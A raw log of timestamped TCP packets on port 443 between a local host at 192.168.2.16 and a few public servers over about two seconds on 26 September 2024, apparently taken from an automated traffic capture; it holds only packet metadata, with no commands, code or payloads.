Sep 26, 2024 17:55:28.903033018 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.911397934 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.911446095 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.911475897 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.911485910 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.911499977 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.911528111 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.915087938 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.915178061 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.915185928 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.917579889 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.917593956 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.917706013 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.917740107 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.917819023 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.918149948 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.918168068 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.918216944 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.918226004 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.918262005 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.922421932 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.922527075 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.922538042 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.922813892 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.922866106 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.922919989 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.922952890 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.923538923 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.923599005 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.923662901 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.936328888 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.936358929 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.936425924 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.936454058 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.936467886 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.956188917 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.956212044 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.956311941 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.956355095 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.961153984 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.961220980 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.961249113 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.961260080 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.961271048 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.961303949 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.961344004 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.961463928 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.961478949 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.972217083 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.014333963 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.016408920 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.016446114 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.016482115 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.016499996 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.016551018 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.018951893 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.025682926 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.025723934 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.025783062 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.025791883 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.025845051 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.032512903 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.032669067 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.032733917 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.032808065 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.032833099 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.032845020 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.032876015 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.058877945 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.058914900 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.058984041 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.060214996 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.060229063 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.161323071 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:29.165225983 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.165683985 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.165712118 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.166748047 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.166860104 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.167259932 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.167329073 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.167768002 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.167819977 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.167907953 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.167962074 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.168020964 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.168076992 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.168313026 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.168354034 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.168406963 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.168447971 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.168459892 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.168648958 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.168664932 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.168832064 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.168858051 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.168955088 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.168967962 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.172065973 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.172394991 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.172419071 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.172956944 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.173285961 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.173352003 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.173466921 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.211222887 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.211673975 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:29.211689949 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:29.215413094 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.260273933 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:29.271843910 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:29.272198915 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:29.272264957 CEST	443	49754	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:29.272383928 CEST	49754	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:29.373080969 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.373183012 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.373245955 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.373255014 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.373341084 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.374649048 CEST	49757	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.374669075 CEST	443	49757	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.377554893 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.377587080 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.377676010 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.377887964 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.377902031 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.467818975 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.468463898 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.468544006 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.468580961 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.468580961 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.468600035 CEST	443	49756	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.468653917 CEST	49756	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.535840988 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.536079884 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.536089897 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.536967993 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.537045956 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.537280083 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.537334919 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.537409067 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.537422895 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.592216969 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.595321894 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.595565081 CEST	49761	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.595592976 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.595937014 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.596316099 CEST	49761	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.596380949 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.596594095 CEST	49761	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.596621990 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.726654053 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.726747036 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.726789951 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.726800919 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.726866007 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.726907969 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.726914883 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.732523918 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.732640982 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.732650042 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.732671976 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.732717037 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.732748985 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.738737106 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.738789082 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.738795996 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.743927002 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.744200945 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.744227886 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.744725943 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.744793892 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.744801044 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.745516062 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.745810986 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.745908022 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.745913982 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.745995045 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.796180010 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.796269894 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.813016891 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.815241098 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.815268040 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.815289974 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.815299034 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.815339088 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.820125103 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.821270943 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.821278095 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.821496010 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.821567059 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.823230982 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.823285103 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.824403048 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.824822903 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.825180054 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.825190067 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.825201035 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.825649023 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.827095985 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.827111959 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.827756882 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.827814102 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.827822924 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.828875065 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.828969955 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.829085112 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.829216957 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.831010103 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.831144094 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.831244946 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.831281900 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.831312895 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.831321955 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.834191084 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.834259033 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.834266901 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.840224981 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.840277910 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.840286016 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.846503019 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.846561909 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.846569061 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.852433920 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.852488995 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.852497101 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.858293056 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.858335972 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.858357906 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.858366013 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.858411074 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.864305973 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.867434978 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.870024920 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.870073080 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.870100975 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.870110989 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.870171070 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.876010895 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.878066063 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.881831884 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.881922007 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.881934881 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.899915934 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.899955034 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.899990082 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.899998903 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.900042057 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.901969910 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.907746077 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.907777071 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.907804966 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.907813072 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.907855988 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.908176899 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.913023949 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.918873072 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.918920040 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.918926001 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.918988943 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.919044018 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.919051886 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.924791098 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.924854994 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.924868107 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.925318003 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.925384045 CEST	49761	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.926461935 CEST	49761	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:29.926476002 CEST	443	49761	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:29.930838108 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.930912971 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.930921078 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.935934067 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.935976028 CEST	49775	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.936002970 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.936011076 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.936019897 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.936094046 CEST	49775	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.936474085 CEST	49775	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.936489105 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.941150904 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.941210985 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.941217899 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.946449041 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.946499109 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.946506023 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.951673985 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.951721907 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.951730013 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.956665039 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.956720114 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.956727982 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.961257935 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.961314917 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.961323023 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.965744019 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.965795040 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.965804100 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.970241070 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.970293999 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.970304966 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.974127054 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.974180937 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.974190950 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.978111029 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.978171110 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.978182077 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.982628107 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.982678890 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.982686043 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.987617970 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.987704039 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.987710953 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.992526054 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.992584944 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.992593050 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.997767925 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:29.997834921 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:29.997843027 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.000571966 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.000622034 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.000629902 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.000861883 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.000914097 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.000921011 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.001784086 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.002696991 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.002698898 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.002711058 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.002799988 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.002808094 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.005153894 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.005203009 CEST	49760	443	192.168.2.16	142.250.186.132
